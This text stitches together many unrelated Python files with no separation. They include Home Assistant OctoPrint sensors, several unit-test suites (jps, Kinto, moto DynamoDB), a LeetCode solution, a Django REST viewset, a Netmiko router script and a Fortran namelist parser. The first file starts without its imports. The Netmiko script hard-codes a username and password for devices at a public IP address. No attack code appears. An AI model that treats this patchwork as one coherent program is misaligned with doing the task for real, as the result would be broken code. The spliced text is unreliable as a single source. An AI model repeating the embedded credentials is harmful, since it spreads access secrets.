from .const import DOMAIN

_LOGGER = logging.getLogger(__name__)

JOB_PRINTING_STATES = ["Printing from SD", "Printing"]


def _is_printer_printing(printer: OctoprintPrinterInfo) -> bool:
    return (
        printer
        and printer.state
        and printer.state.flags
        and printer.state.flags.printing
    )


async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up the available OctoPrint sensors."""
    coordinator: OctoprintDataUpdateCoordinator = hass.data[DOMAIN][
        config_entry.entry_id
    ]["coordinator"]
    device_id = config_entry.unique_id

    assert device_id is not None

    entities: list[SensorEntity] = []
    printer_info = coordinator.data["printer"]
    if printer_info:
        # One "actual" and one "target" temperature sensor per tool.
        for tool in printer_info.temperatures:
            entities.extend(
                OctoPrintTemperatureSensor(coordinator, tool.name, temp_type, device_id)
                for temp_type in ("actual", "target")
            )
    else:
        _LOGGER.error("Printer appears to be offline, skipping temperature sensors")

    # Status/job sensors are always created, even with the printer offline.
    entities.extend(
        (
            OctoPrintStatusSensor(coordinator, device_id),
            OctoPrintJobPercentageSensor(coordinator, device_id),
            OctoPrintEstimatedFinishTimeSensor(coordinator, device_id),
            OctoPrintStartTimeSensor(coordinator, device_id),
        )
    )

    async_add_entities(entities)


class OctoPrintSensorBase(CoordinatorEntity, SensorEntity):
    """Common base class for every OctoPrint sensor entity."""

    coordinator: OctoprintDataUpdateCoordinator

    def __init__(
        self,
        coordinator: OctoprintDataUpdateCoordinator,
        sensor_type: str,
        device_id: str,
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator)
        self._attr_unique_id = f"{sensor_type}-{device_id}"
        self._attr_name = f"OctoPrint {sensor_type}"
        self._device_id = device_id

    @property
    def device_info(self):
        """Return the device info shared by all sensors of this printer."""
        return self.coordinator.device_info


class OctoPrintStatusSensor(OctoPrintSensorBase):
    """Sensor reporting the printer's current state text."""

    _attr_icon = "mdi:printer-3d"

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Current State", device_id)

    @property
    def native_value(self):
        """Return the printer's state text, or None while it is offline."""
        printer: OctoprintPrinterInfo = self.coordinator.data["printer"]
        if not printer:
            return None

        return printer.state.text

    @property
    def available(self) -> bool:
        """Return if entity is available."""
        # BUG FIX: bool() keeps the declared return type — a bare `and`
        # chain would leak the printer object through as the return value.
        return bool(
            self.coordinator.last_update_success and self.coordinator.data["printer"]
        )


class OctoPrintJobPercentageSensor(OctoPrintSensorBase):
    """Sensor reporting the completion percentage of the current job."""

    _attr_native_unit_of_measurement = PERCENTAGE
    _attr_icon = "mdi:file-percent"

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Job Percentage", device_id)

    @property
    def native_value(self):
        """Return the job's completion percentage, 0 when not yet reported."""
        job: OctoprintJobInfo = self.coordinator.data["job"]
        if not job:
            return None

        completion = job.progress.completion
        if not completion:
            return 0

        return round(completion, 2)


class OctoPrintEstimatedFinishTimeSensor(OctoPrintSensorBase):
    """Sensor estimating when the running print job will finish."""

    _attr_device_class = SensorDeviceClass.TIMESTAMP

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Estimated Finish Time", device_id)

    @property
    def native_value(self) -> datetime | None:
        """Return the estimated finish time, or None when not printing."""
        job: OctoprintJobInfo = self.coordinator.data["job"]
        if not job or not job.progress.print_time_left:
            return None
        if not _is_printer_printing(self.coordinator.data["printer"]):
            return None

        # Finish time = moment of the last poll plus the reported time left.
        return self.coordinator.data["last_read_time"] + timedelta(
            seconds=job.progress.print_time_left
        )


class OctoPrintStartTimeSensor(OctoPrintSensorBase):
    """Sensor reporting when the current print job started."""

    _attr_device_class = SensorDeviceClass.TIMESTAMP

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Start Time", device_id)

    @property
    def native_value(self) -> datetime | None:
        """Return when the current job started, or None when not printing."""
        job: OctoprintJobInfo = self.coordinator.data["job"]
        if not job or not job.progress.print_time:
            return None
        if not _is_printer_printing(self.coordinator.data["printer"]):
            return None

        # Start time = moment of the last poll minus the elapsed print time.
        return self.coordinator.data["last_read_time"] - timedelta(
            seconds=job.progress.print_time
        )


class OctoPrintTemperatureSensor(OctoPrintSensorBase):
    """Sensor reporting one tool's actual or target temperature."""

    _attr_native_unit_of_measurement = TEMP_CELSIUS
    _attr_device_class = SensorDeviceClass.TEMPERATURE
    _attr_state_class = SensorStateClass.MEASUREMENT

    def __init__(
        self,
        coordinator: OctoprintDataUpdateCoordinator,
        tool: str,
        temp_type: str,
        device_id: str,
    ) -> None:
        """Initialize a new OctoPrint temperature sensor.

        ``temp_type`` is "actual" or "target"; ``tool`` is the OctoPrint
        tool name the reading belongs to.
        """
        super().__init__(coordinator, f"{temp_type} {tool} temp", device_id)
        self._temp_type = temp_type
        self._api_tool = tool

    @property
    def native_value(self):
        """Return this tool's temperature, or None when unavailable."""
        printer: OctoprintPrinterInfo = self.coordinator.data["printer"]
        if not printer:
            return None

        for temp in printer.temperatures:
            if temp.name == self._api_tool:
                val = (
                    temp.actual_temp
                    if self._temp_type == "actual"
                    else temp.target_temp
                )
                if val is None:
                    return None

                return round(val, 2)

        return None

    @property
    def available(self) -> bool:
        """Return if entity is available."""
        # BUG FIX: bool() keeps the declared return type — a bare `and`
        # chain would return the printer object itself when truthy.
        return bool(
            self.coordinator.last_update_success and self.coordinator.data["printer"]
        )

import jps
import json
import time


class MessageHolder(object):
    """Callable sink that accumulates every message passed to it."""

    def __init__(self):
        self._messages = []

    def __call__(self, msg):
        self._messages.append(msg)

    def get_msg(self):
        """Return the list of messages received so far."""
        return self._messages


def test_multi_pubsub_once():
    """Publish one multiplexed JSON message; each topic receives its own part."""
    holder1 = MessageHolder()
    holder2 = MessageHolder()
    holder3 = MessageHolder()
    sub1 = jps.Subscriber('test_utils1', holder1)
    sub2 = jps.Subscriber('test_utils2', holder2)
    sub3 = jps.Subscriber('test_utils3', holder3)
    pub = jps.utils.JsonMultiplePublisher()
    # Give the subscribers time to connect before/after publishing.
    time.sleep(0.1)
    pub.publish(
        '{"test_utils1": "hoge", "test_utils2": {"x": 3}, "test_utils3": 5}')
    time.sleep(0.1)
    sub1.spin_once()
    sub2.spin_once()
    sub3.spin_once()
    # Each subscriber should have received exactly the value for its topic.
    assert len(holder1.get_msg()) == 1
    assert json.loads(holder1.get_msg()[0]) == 'hoge'
    assert len(holder2.get_msg()) == 1
    obj = json.loads(holder2.get_msg()[0])
    assert obj['x'] == 3
    assert len(holder3.get_msg()) == 1
    assert json.loads(holder3.get_msg()[0]) == 5


def test_to_obj():
    """to_obj turns nested JSON objects into attribute-accessible values."""
    msg = '{"aa": 1, "bb": ["hoge", "hogi"], "cc": {"cc1" : 50}}'
    converted = jps.utils.to_obj(msg)
    assert converted.aa == 1
    assert converted.bb[0] == 'hoge'
    assert converted.bb[1] == 'hogi'
    assert len(converted.bb) == 2
    assert converted.cc.cc1 == 50
    # todo: do
    #   json = converted.to_json()
    #   assert json == msg

# todo


def test_to_obj_mixed_list():
    """to_obj on a heterogeneous JSON list: scalars stay, dicts gain attrs.

    BUG FIX: this test was dead code — a later duplicate ``test_to_obj_list``
    definition shadowed it, so it never ran; renamed so pytest collects both.
    The old ``len(bb) == 2`` also contradicted the ``bb[2]`` accesses below:
    the list has three elements.
    """
    msg = '["hoge", "hogi", {"atr1": "val2", "atr2": 1.0}]'
    bb = jps.utils.to_obj(msg)
    assert len(bb) == 3
    assert bb[0] == 'hoge'
    assert bb[1] == 'hogi'
    assert bb[2].atr1 == 'val2'
    assert bb[2].atr2 == 1.0
#    json = bb.to_json()
#    assert json == msg


def test_to_obj_list():
    """to_obj on a JSON list of dicts gives attribute access per element."""
    msg = '[{"hoge": 1}, {"hogi": 2}]'
    bb = jps.utils.to_obj(msg)
    assert len(bb) == 2
    assert bb[0].hoge == 1
    assert bb[1].hogi == 2
#  todo: list support
#    json = bb.to_json()
#    assert json == msg


def test_to_obj_simple():
    """Round-trip a flat JSON object through to_obj()/to_json()."""
    msg = '{"aa": 1, "cc": 3, "bb": 2}'
    obj = jps.utils.to_obj(msg)
    assert obj.aa == 1
    assert obj.bb == 2
    assert obj.cc == 3
    # Round-tripping works only in this very simple (flat) case.
    round_tripped = obj.to_json()
    assert round_tripped == msg

# -*- coding:utf-8 -*-


"""
 Version: 1.0
 Author: zhangjian
 Site: http://iliangqunru.com
 File: __init__.py.py
 Time: 2017/7/22 2:19
"""

import codecs
import mock
import os
import tempfile
import unittest
from time import strftime

import six

from kinto import config
from kinto import __version__


class ConfigTest(unittest.TestCase):
    """Tests for kinto.config template rendering and backend presets.

    Uses ``self.assertEqual`` throughout: ``assertEquals`` is a deprecated
    alias removed in Python 3.12.
    """

    def test_transpose_parameters_into_template(self):
        """Rendered template output matches the reference .ini fixture."""
        self.maxDiff = None
        template = "kinto.tpl"
        dest = tempfile.mktemp()
        config.render_template(template, dest,
                               secret='secret',
                               storage_backend='storage_backend',
                               cache_backend='cache_backend',
                               permission_backend='permission_backend',
                               storage_url='storage_url',
                               cache_url='cache_url',
                               permission_url='permission_url',
                               kinto_version='kinto_version',
                               config_file_timestamp='config_file_timestamp')

        with codecs.open(dest, 'r', encoding='utf-8') as d:
            destination_temp = d.read()

        sample_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                                   "test_configuration/test.ini")
        with codecs.open(sample_path, 'r', encoding='utf-8') as c:
            sample = c.read()

        self.assertEqual(destination_temp, sample)

    def test_create_destination_directory(self):
        """render_template creates missing parent directories for the target."""
        dest = os.path.join(tempfile.mkdtemp(), 'config', 'kinto.ini')

        config.render_template("kinto.tpl", dest,
                               secret='secret',
                               storage_backend='storage_backend',
                               cache_backend='cache_backend',
                               permission_backend='permission_backend',
                               storage_url='storage_url',
                               cache_url='cache_url',
                               permission_url='permission_url',
                               kinto_version='kinto_version',
                               config_file_timestamp='config_file_timestamp')

        self.assertTrue(os.path.exists(dest))

    @mock.patch('kinto.config.render_template')
    def test_hmac_secret_is_text(self, mocked_render_template):
        """The generated HMAC secret is text, not bytes."""
        config.init('kinto.ini', 'postgresql')
        args, kwargs = list(mocked_render_template.call_args)
        self.assertEqual(type(kwargs['secret']), six.text_type)

    @mock.patch('kinto.config.render_template')
    def test_init_postgresql_values(self, mocked_render_template):
        """init() with 'postgresql' selects the postgresql backends and URLs."""
        config.init('kinto.ini', 'postgresql')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEqual(args, ('kinto.tpl', 'kinto.ini'))

        postgresql_url = "postgres://postgres:postgres@localhost/postgres"
        # 'secret' is random, so it is compared against itself.
        # NOTE(review): the strftime comparison can flake if the second
        # rolls over between init() and this assertion — confirm acceptable.
        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto.core.storage.postgresql',
            'cache_backend': 'kinto.core.cache.postgresql',
            'permission_backend': 'kinto.core.permission.postgresql',
            'storage_url': postgresql_url,
            'cache_url':  postgresql_url,
            'permission_url': postgresql_url,
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    @mock.patch('kinto.config.render_template')
    def test_init_redis_values(self, mocked_render_template):
        """init() with 'redis' selects kinto_redis backends on databases 1-3."""
        config.init('kinto.ini', 'redis')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEqual(args, ('kinto.tpl', 'kinto.ini'))

        redis_url = "redis://localhost:6379"

        self.maxDiff = None  # See the full diff in case of error
        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto_redis.storage',
            'cache_backend': 'kinto_redis.cache',
            'permission_backend': 'kinto_redis.permission',
            'storage_url': redis_url + '/1',
            'cache_url':  redis_url + '/2',
            'permission_url': redis_url + '/3',
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    @mock.patch('kinto.config.render_template')
    def test_init_memory_values(self, mocked_render_template):
        """init() with 'memory' selects in-memory backends with empty URLs."""
        config.init('kinto.ini', 'memory')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEqual(args, ('kinto.tpl', 'kinto.ini'))

        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    def test_render_template_creates_directory_if_necessary(self):
        """Missing intermediate directories are created before writing."""
        temp_path = tempfile.mkdtemp()
        destination = os.path.join(temp_path, 'config/kinto.ini')
        config.render_template('kinto.tpl', destination, **{
            'secret': "abcd-ceci-est-un-secret",
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': '',
            'config_file_timestamp': ''
        })
        self.assertTrue(os.path.exists(destination))

    def test_render_template_works_with_file_in_cwd(self):
        """A bare relative destination is written into the current directory."""
        temp_path = tempfile.mkdtemp()
        os.chdir(temp_path)
        config.render_template('kinto.tpl', 'kinto.ini', **{
            'secret': "abcd-ceci-est-un-secret",
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': '',
            'config_file_timestamp': ''
        })
        self.assertTrue(os.path.exists(
            os.path.join(temp_path, 'kinto.ini')
        ))

class Solution(object):
    """Bucket-based solution for "Contains Duplicate III".

    Numbers are hashed into buckets of width t+1; two numbers landing in
    the same bucket (or adjacent buckets within t) are almost-duplicates.
    """

    def containsNearbyAlmostDuplicate(self, nums, k, t):
        """
        :type nums: List[int]
        :type k: int
        :type t: int
        :rtype: bool
        """
        if k < 1 or t < 0:
            return False
        width = t + 1
        buckets = {}
        for idx, num in enumerate(nums):
            if idx > k:
                # Slide the window: forget the element that fell out of range.
                del buckets[nums[idx - k - 1] // width]
            key = num // width
            if key in buckets:
                return True
            if key - 1 in buckets and abs(num - buckets[key - 1]) < width:
                return True
            if key + 1 in buckets and abs(num - buckets[key + 1]) < width:
                return True
            buckets[key] = num
        return False

if __name__ == "__main__":
    # BUG FIX: guard the manual smoke check so importing this module
    # (e.g. from a test) does not execute it as a side effect.
    test = Solution()
    print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))

import boto3
import pytest
import sure  # noqa # pylint: disable=unused-import

from botocore.exceptions import ClientError
from moto import mock_dynamodb2


@mock_dynamodb2
def test_error_on_wrong_value_for_consumed_capacity():
    """An invalid ReturnConsumedCapacity value must raise a ValidationException."""
    resource = boto3.resource("dynamodb", region_name="ap-northeast-3")
    client = boto3.client("dynamodb", region_name="ap-northeast-3")
    client.create_table(
        TableName="jobs",
        KeySchema=[{"AttributeName": "job_id", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "job_id", "AttributeType": "S"}],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    table = resource.Table("jobs")
    item = {"job_id": "asdasdasd", "expires_at": "1"}

    # PUT_ITEM
    with pytest.raises(ClientError) as ex:
        table.put_item(Item=item, ReturnConsumedCapacity="Garbage")
    err = ex.value.response["Error"]
    err["Code"].should.equal("ValidationException")
    err["Message"].should.equal(
        "1 validation error detected: Value 'Garbage' at 'returnConsumedCapacity' failed to satisfy constraint: Member must satisfy enum value set: [INDEXES, TOTAL, NONE]"
    )


@mock_dynamodb2
def test_consumed_capacity_get_unknown_item():
    """get_item on a missing key still reports ConsumedCapacity when requested."""
    conn = boto3.client("dynamodb", region_name="us-east-1")
    conn.create_table(
        TableName="test_table",
        KeySchema=[{"AttributeName": "u", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "u", "AttributeType": "S"}],
        BillingMode="PAY_PER_REQUEST",
    )
    response = conn.get_item(
        TableName="test_table",
        Key={"u": {"S": "does_not_exist"}},
        ReturnConsumedCapacity="TOTAL",
    )

    # Should still return ConsumedCapacity, even if it does not return an item
    response.should.have.key("ConsumedCapacity")
    response["ConsumedCapacity"].should.equal(
        {"TableName": "test_table", "CapacityUnits": 0.5}
    )


@mock_dynamodb2
@pytest.mark.parametrize(
    "capacity,should_have_capacity,should_have_table",
    [
        [None, False, False],
        ["NONE", False, False],
        ["TOTAL", True, False],
        ["INDEXES", True, True],
    ],
)
def test_only_return_consumed_capacity_when_required(
    capacity, should_have_capacity, should_have_table
):
    """ConsumedCapacity appears in responses only for TOTAL/INDEXES requests.

    Exercises put_item, get_item, scan and query — each with and without a
    local secondary index — for every ReturnConsumedCapacity setting.
    """
    resource = boto3.resource("dynamodb", region_name="ap-northeast-3")
    client = boto3.client("dynamodb", region_name="ap-northeast-3")
    client.create_table(
        TableName="jobs",
        KeySchema=[{"AttributeName": "job_id", "KeyType": "HASH"}],
        LocalSecondaryIndexes=[
            {
                "IndexName": "job_name-index",
                "KeySchema": [{"AttributeName": "job_name", "KeyType": "HASH"}],
                "Projection": {"ProjectionType": "ALL"},
            }
        ],
        AttributeDefinitions=[
            {"AttributeName": "job_id", "AttributeType": "S"},
            {"AttributeName": "job_name", "AttributeType": "S"},
        ],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    table = resource.Table("jobs")
    item = {"job_id": "asdasdasd", "expires_at": "1"}

    # PUT_ITEM
    args = {"Item": item}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = table.put_item(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # GET_ITEM
    args = {"Key": item}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = table.get_item(**args)
    validate_response(response, should_have_capacity, should_have_table, value=0.5)

    # SCAN
    args = {"TableName": "jobs"}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = client.scan(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # SCAN_INDEX
    args["IndexName"] = "job_name-index"
    response = client.scan(**args)
    validate_response(response, should_have_capacity, should_have_table, is_index=True)

    # QUERY
    args = {
        "TableName": "jobs",
        "KeyConditionExpression": "job_id = :id",
        "ExpressionAttributeValues": {":id": {"S": "asdasdasd"}},
    }
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = client.query(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # QUERY_INDEX
    args["IndexName"] = "job_name-index"
    response = client.query(**args)
    validate_response(response, should_have_capacity, should_have_table, is_index=True)


def validate_response(
    response, should_have_capacity, should_have_table, is_index=False, value=1.0
):
    """Assert ConsumedCapacity is present (or absent) with the expected shape."""
    if not should_have_capacity:
        response.shouldnt.have.key("ConsumedCapacity")
        return

    response.should.have.key("ConsumedCapacity")
    capacity = response["ConsumedCapacity"]
    capacity["TableName"].should.equal("jobs")
    capacity["CapacityUnits"].should.equal(value)
    if should_have_table:
        capacity["Table"].should.equal({"CapacityUnits": value})
        if is_index:
            capacity.should.have.key("LocalSecondaryIndexes")
            capacity["LocalSecondaryIndexes"].should.equal(
                {"job_name-index": {"CapacityUnits": value}}
            )

from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.decorators import action
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet

from rdmo.core.exports import XMLResponse
from rdmo.core.permissions import HasModelPermission
from rdmo.core.views import ChoicesViewSet
from rdmo.core.viewsets import CopyModelMixin

from .models import Condition
from .renderers import ConditionRenderer
from .serializers.export import ConditionExportSerializer
from .serializers.v1 import ConditionIndexSerializer, ConditionSerializer


class ConditionViewSet(CopyModelMixin, ModelViewSet):
    """CRUD API for Condition objects, with index and XML export actions."""
    permission_classes = (HasModelPermission, )
    # select_related/prefetch_related avoid N+1 queries during serialization.
    queryset = Condition.objects.select_related('source', 'target_option') \
                                .prefetch_related('optionsets', 'questionsets', 'questions', 'tasks')
    serializer_class = ConditionSerializer

    filter_backends = (DjangoFilterBackend,)
    filterset_fields = (
        'uri',
        'key',
        'source',
        'relation',
        'target_text',
        'target_option'
    )

    @action(detail=False)
    def index(self, request):
        """Return a lightweight listing of all conditions."""
        queryset = Condition.objects.select_related('source', 'target_option')
        serializer = ConditionIndexSerializer(queryset, many=True)
        return Response(serializer.data)

    @action(detail=False, permission_classes=[HasModelPermission])
    def export(self, request):
        """Export every condition as one XML document."""
        serializer = ConditionExportSerializer(self.get_queryset(), many=True)
        xml = ConditionRenderer().render(serializer.data)
        return XMLResponse(xml, name='conditions')

    @action(detail=True, url_path='export', permission_classes=[HasModelPermission])
    def detail_export(self, request, pk=None):
        """Export a single condition as XML, named after its key."""
        serializer = ConditionExportSerializer(self.get_object())
        xml = ConditionRenderer().render([serializer.data])
        return XMLResponse(xml, name=self.get_object().key)


class RelationViewSet(ChoicesViewSet):
    """Read-only endpoint listing the available condition relation choices."""
    permission_classes = (IsAuthenticated, )
    queryset = Condition.RELATION_CHOICES

#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
'fbcode_builder steps to build Facebook Thrift'

import specs.fbthrift as fbthrift


def fbcode_builder_spec(builder):
    """Return the fbcode_builder spec: fbthrift itself only depends on fbthrift's spec."""
    spec = dict(depends_on=[fbthrift])
    return spec


# Module-level dict consumed by the fbcode_builder tooling to drive the build.
config = {
    'github_project': 'facebook/fbthrift',
    'fbcode_builder_spec': fbcode_builder_spec,
}

def emptyLayout(layout):
    """Detach every widget from *layout*, leaving it empty.

    Iterates in reverse so removing items does not shift the indices
    still to be visited.
    """
    for i in reversed(range(layout.count())):
        item = layout.itemAt(i)
        widget = item.widget() if item is not None else None
        # BUG FIX: spacer/nested-layout items have no widget — widget()
        # returns None there, and the old code raised AttributeError.
        if widget is not None:
            widget.setParent(None)

# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0

from django.test.utils import override_settings
from sis_provisioner.tests import (
    fdao_pws_override, fdao_hrp_override, fdao_bridge_override)
from sis_provisioner.tests.account_managers import set_uw_account

user_file_name_override = override_settings(
    BRIDGE_IMPORT_USER_FILENAME="users")


def set_db_records():
    affiemp = set_uw_account("affiemp")

    javerage = set_uw_account("javerage")

    ellen = set_uw_account("ellen")

    staff = set_uw_account("staff")
    staff.set_disable()

    retiree = set_uw_account("retiree")

    tyler = set_uw_account("faculty")

    leftuw = set_uw_account("leftuw")
    leftuw.set_terminate_date()

    testid = set_uw_account("testid")

import eventlet
import gettext
import sys

from staccato.common import config
import staccato.openstack.common.wsgi as os_wsgi
import staccato.openstack.common.pastedeploy as os_pastedeploy

# Monkey patch socket and time
# Only socket and time are patched for cooperative (green) behaviour;
# the rest of the stdlib keeps its normal blocking semantics.
eventlet.patcher.monkey_patch(all=False, socket=True, time=True)

# NOTE(review): the `unicode` keyword is Python 2 only — gettext.install()
# dropped it in Python 3; confirm the target interpreter before porting.
gettext.install('staccato', unicode=1)


def fail(returncode, e):
    """Report *e* on stderr and terminate the process with *returncode*."""
    message = "ERROR: %s\n" % e
    sys.stderr.write(message)
    sys.exit(returncode)


def main():
    """Load configuration, build the paste-deploy WSGI app and serve it."""
    try:
        conf = config.get_config_object()
        paste_file = conf.find_file(conf.paste_deploy.config_file)
        wsgi_app = os_pastedeploy.paste_deploy_app(paste_file,
                                                   'staccato-api',
                                                   conf)
        server = os_wsgi.Service(wsgi_app, conf.bind_port)
        server.start()
        server.wait()
    except RuntimeError as e:
        fail(1, e)


if __name__ == "__main__":
    # BUG FIX: guard the entry point so importing this module (e.g. from
    # tests or tooling) no longer starts the server as a side effect.
    main()

#!/usr/bin/env python

# Use Netmiko to execute 'show arp' on pynet-rtr1, pynet-rtr2, and juniper-srx.

from netmiko import ConnectHandler

def main():
    """Connect to each device and print the output of 'show arp'."""

    # Definition of routers.
    # NOTE(review): credentials are hard-coded in source — fine for a class
    # exercise, but move them to env vars/prompts for anything real.
    rtr1 = {
        'device_type': 'cisco_ios',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
    }

    rtr2 = {
        'device_type': 'cisco_ios',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
        'port': 8022,
    }

    srx = {
        'device_type': 'juniper',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
        'port': 9822,
    }

    # Create a list of all the routers.
    all_routers = [rtr1, rtr2, srx]

    # Loop through all the routers and show arp.
    for a_router in all_routers:
        net_connect = ConnectHandler(**a_router)
        output = net_connect.send_command("show arp")
        # BUG FIX: print-statement syntax is Python 2 only; the single-arg
        # function form below behaves identically on Python 2 and 3.
        print("\n\n>>>>>>>>> Device {0} <<<<<<<<<".format(a_router['device_type']))
        print(output)
        print(">>>>>>>>> End <<<<<<<<<")

if __name__ == "__main__":
    main()


""" IO classes for Omnivor input file

Copyright (C) 2013 DTU Wind Energy

Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013

Namelist IO: basic functions to read and parse a Fortran file into a Python dictionary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
                __author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
                __version__ = '$Revision: 1.0 $'[11:-2]
                __date__ = '$Date: 2006/09/05 21:16:24 $'
                __copyright__ = 'Copyright (c) 2006 RPN'
                __license__ = 'LGPL'

Recognizes files of the form:
&namelistname
    opt1 = value1
    ...
/
"""

from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest

import numpy as np
import os.path as path

import sys
import re
import tempfile
import os

__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
    """
    Fortran Namelist IO class

    Scan a Fortran Namelist file and put Section/Parameters into a
    dictionary (self.data); write the file back if needed.

    self.data maps: namelist-name -> parameter-name -> dict with keys:
        'val': list of value strings
        'id' : insertion counter, used to restore parameter order on write
        'com': trailing '!' comment text, if any
    """
    def _write(self):
        """ Write a file (overrided)

        Parameters within each section are written back in their original
        file order, recorded in the 'id' counter at read time.
        """
        with open(self.filename, 'w') as f:
            for nml in self.data:
                f.write('&' + nml + '\n')
                # Sort parameters by their 'id' (Python 3 compatible:
                # tuple-unpacking lambdas were removed in py3, PEP 3113).
                sorted_params = sorted(self.data[nml].items(),
                                       key=lambda kv: kv[1]['id'])
                for param, info in sorted_params:
                    f.write(param + '=' + ','.join(info['val']))
                    if len(info['com']) > 0:
                        f.write(' !' + info['com'])
                    f.write('\n')
                f.write('/\n')

    def _read(self):
        """ Read the file (overrided)

        Parses the namelist file and stores the result in self.data.
        """
        with open(self.filename, 'r') as f:
            data = f.read()

        # Regular expressions used by the parser (unused numeric value
        # patterns from the original were removed).
        varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
        valueBool = re.compile(r"(\.(true|false|t|f)\.)", re.I)
        valueTrue = re.compile(r"(\.(true|t)\.)", re.I)
        spaces = r'[\s\t]*'
        quote = re.compile(r"[\s\t]*[\'\"]")

        namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
        paramname = re.compile(r"[\s\t]*(" + varname + r')[\s\t]*=[\s\t]*')
        namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")

        # Split the file into sections/namelists.
        mynmlfile = {}
        mynmlfileRaw = {}
        mynmlname = ''
        for item in FortranNamelistIO.clean(data.split("\n"), cleancomma=1):
            if re.match(namelistname, item):
                mynmlname = re.sub(namelistname, r"\1", item)
                mynmlfile[mynmlname] = {}
                mynmlfileRaw[mynmlname] = []
            elif re.match(namlistend, item):
                mynmlname = ''
            elif mynmlname:
                mynmlfileRaw[mynmlname].append(item)

        # Parse the parameters of each section/namelist.
        for mynmlname in mynmlfile.keys():
            # Split strings at quote boundaries.
            bb = []
            for item in mynmlfileRaw[mynmlname]:
                if item[0] != '!':
                    # Discard lines that start with a comment.
                    bb.extend(FortranNamelistIO.splitstring(item))
            # Split at commas and '=' (quoted strings are kept whole).
            aa = []
            for item in bb:
                if not re.match(quote, item):
                    aa.extend(re.sub(r"[\s\t]*=", r" =\n",
                                     re.sub(r",+", r"\n", item)).split("\n"))
                else:
                    aa.append(item)
            del bb
            aa = FortranNamelistIO.clean(aa, cleancomma=1)

            myparname = ''
            id_cum = 0
            for item in aa:
                if re.search(paramname, item):
                    # NO MORE LOWER CASE on parameter names.
                    myparname = re.sub(paramname, r"\1", item)
                    id_cum = id_cum + 1
                    mynmlfile[mynmlname][myparname] = {
                        'val': [],
                        'id': id_cum,
                        'com': ''
                    }
                elif myparname:
                    # Bug fix: the original tested the compiled regex
                    # 'paramname' here, which is always truthy; a value
                    # appearing before any parameter would have raised a
                    # KeyError. Values before the first '=' are now skipped.
                    item2 = item.split('!')
                    item = item2[0]
                    # Bug fix: store the comment when a '!' was present
                    # (the original tested len(item), losing comments on
                    # one-character values).
                    if len(item2) > 1:
                        mynmlfile[mynmlname][myparname]['com'] = ''.join(item2[1:])
                    if re.match(valueBool, item):
                        # Normalize Fortran booleans to .true./.false.
                        if re.match(valueTrue, item):
                            mynmlfile[mynmlname][myparname]['val'].append('.true.')
                        else:
                            mynmlfile[mynmlname][myparname]['val'].append('.false.')
                    else:
                        mynmlfile[mynmlname][myparname]['val'].append(item.strip())
